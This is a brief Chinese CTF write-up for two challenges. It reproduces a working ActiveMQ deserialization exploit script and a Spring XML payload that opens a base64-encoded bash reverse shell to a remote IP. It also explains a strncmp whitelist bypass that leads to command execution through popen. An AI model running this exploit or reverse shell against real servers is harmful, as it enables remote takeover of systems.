rw体验赛wp
唉,咱好菜,就出了两个题,ghostscript那个题调了半天没调通
Be-an-ActiveMq-Hacker
搜了一下 用网上的exp打通了
https://blog.csdn.net/weixin_49125123/article/details/135577221
import io
import socket
import sys
def main(ip, port, xml):
classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_obj.connect((ip, port))
with socket_obj:
out = socket_obj.makefile('wb')
# out = io.BytesIO() # 创建一个内存中的二进制流
out.write(int(32).to_bytes(4, 'big'))
out.write(bytes([31]))
out.write(int(1).to_bytes(4, 'big'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(int(1).to_bytes(4, 'big'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(len(classname).to_bytes(2, 'big'))
out.write(classname.encode('utf-8'))
out.write(bool(True).to_bytes(1, 'big'))
out.write(len(xml).to_bytes(2, 'big'))
out.write(xml.encode('utf-8'))
# print(list(out.getvalue()))
out.flush()
out.close()
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
"http://192.168.0.101:8888/poc.xml")
exit(-1)
main(sys.argv[1], int(sys.argv[2]), sys.argv[3])
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzIvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}</value>
</list>
</constructor-arg>
</bean>
</beans>
vision
问题出在 not Support 4 这里,在 strncmp这,
else
{
memset(s2, 0, sizeof(s2));
v11 = strchr(a1, 32);
if ( v11 )
{
strncpy(s2, a1, v11 - a1);
}
else
{
n = strlen(a1);
strncpy(s2, a1, n);
}
v13 = strlen(s2);
if ( v13 )
{
v7 = 0;
v10 = off_4020[0];
while ( strncmp(v10, s2, v13) )
{
v10 = off_4020[++v7];
if ( !off_4020[v7] )
{
strcpy(a2, "Not Support 4. \n");
return __readfsqword(0x28u) ^ v23;
}
}这里的逻辑是,判断输入的字符串在不在命令列表里面,strncmp 需要一个大小的参数,来判断cmp多少字节,cmp成功后会先判断是不是一些预设的命令,如果不是就会传到下边popen那执行命令
.data:0000000000004020 6B 20 00 00 00 00 00 00 off_4020 dq offset s1 ; DATA XREF: sub_1589+3E5↑o
.data:0000000000004020 ; sub_1589+410↑o
.data:0000000000004020 ; sub_1589+432↑o
.data:0000000000004020 ; "ping"
.data:0000000000004028 70 20 00 00 00 00 00 00 dq offset aUname ; "uname"
.data:0000000000004030 76 20 00 00 00 00 00 00 dq offset aPwd ; "pwd"
.data:0000000000004038 7A 20 00 00 00 00 00 00 dq offset aDate ; "date"
.data:0000000000004040 7F 20 00 00 00 00 00 00 dq offset aId ; "id"
.data:0000000000004048 82 20 00 00 00 00 00 00 dq offset aWhoami ; "whoami"
.data:0000000000004050 89 20 00 00 00 00 00 00 dq offset aPoweroff ; "poweroff"
.data:0000000000004058 92 20 00 00 00 00 00 00 dq offset aShowkey ; "showKey"
.data:0000000000004060 9A 20 00 00 00 00 00 00 dq offset aOpenthedoor ; "openthedoor"
.data:0000000000004068 00 00 00 00 00 00 00 00 align 10h else
{
stream = popen(a1, "re");
if ( !stream )
{
perror("popen failed");
exit(1);
}
while ( fgets(s, 256, stream) )
strcat(a2, s);
pclose(stream);
}
}命令列表那有一个showkey,如果传一个sh,strncmp cmp两个字节,这个cmp就过了,会传到下边popen那执行命令
exp
sh -c "cat /flag"